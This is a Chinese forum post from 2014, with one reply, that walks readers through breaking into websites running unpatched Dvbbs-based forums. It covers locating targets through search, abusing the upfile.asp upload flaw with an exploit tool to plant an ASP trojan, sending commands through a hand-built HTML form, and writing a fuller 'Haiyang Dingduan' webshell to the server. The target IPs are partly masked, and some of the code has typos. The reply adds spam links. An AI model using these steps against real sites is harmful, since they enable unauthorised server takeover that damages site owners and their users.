联云网络★曾华 发表于 2014-8-21 16:27:07

如何利用动网论坛漏洞入侵网站


动网论坛从出名的那天起,关于它的漏洞就不断出现。它的上传文件upfile.asp中的代码就存在漏洞,可以构造虚假数据,从而欺骗代码本身的限制。利用此漏洞可达到上传asp后门的目的,从而控制整个网站甚至网站所在的主机。具体操作:
   一、测试目标。借助百度搜索:E度阳光论坛(它是动网论坛的一个美化版本),从中随便打开一个看看它的上传文件名是否更改,输入地址:http://218.**.**.**/mir2/bbs/upfile.asp,如果看到提示:请先选择你要上传的文件[重新上传],说明此论坛未做防范措施,那么就可以测试了!
   二、利用explot:exp.exe上传木马。在$Host=下输入要测试论坛的根路径:http://218.**.**.**/mir2/,然后确认,exploit提示输入传输端口,输入80,再确认,在$way=中输入论坛的具体文件夹:/bbs/,确认。这个程序就可开始利用漏洞向指定论坛上传内置asp木马,地址为:http://218.**.**.**/mir2/bbs/ uploadface/a s p. a s p,看到一片空白就说明已经成功了,这就是已上传木马的显示状态。
   三、打开记事本,输入以下代码:   <form action=http://218.**.**.**/mir2/bbs/uploadface/asp.asp method=post>
   <textarea name=a cols=80 rows=10 width=32>
    response.write
server.mappath(request.servervariables("SCRIPT_NAME"))</textarea>
    <trxtarea name=b cols=80 rows=10 width=32></textarea>
    <input type=submit value=运行>
    </form>
    然后保存为heidan.html,
   打开heidan.html,可以看到一个本地提交的简单页面,点击“运行”按钮可看到显示结果为:d:\mir2,这个目录就是存在目标网站web文件的文件夹。
   四、利用已经上传的asp木马上传一些功能更为强大的asp木马,以海洋顶端木马为例:
   同样打开heidan.html,在上面的文本框中输入代码:
   set objfso=server.createobject("seripting.filesystemobject")
   fdata=request("b")
   set objcountfile=objfso.createtextfile("d:\mir2\mm.asp",true)
    objcountfile.writ fdata
   用记事本打开海洋顶端木马,将代码复制下来,粘贴在下面的文本框中,提交,当提示成功之后,打开已经上传海洋顶端木马的地址:http://218.**.**.**/mir2/mm.asp,可以看到已经上传成功。一切尽在掌握之中。

青春太潦草 发表于 2015-7-9 11:58:47

说的很好,感谢楼主无私的分享
www.667878.info
www.xxkuaibo.com
www.wooguu.com
www.hg0080.info
页: [1]
查看完整版本: 如何利用动网论坛漏洞入侵网站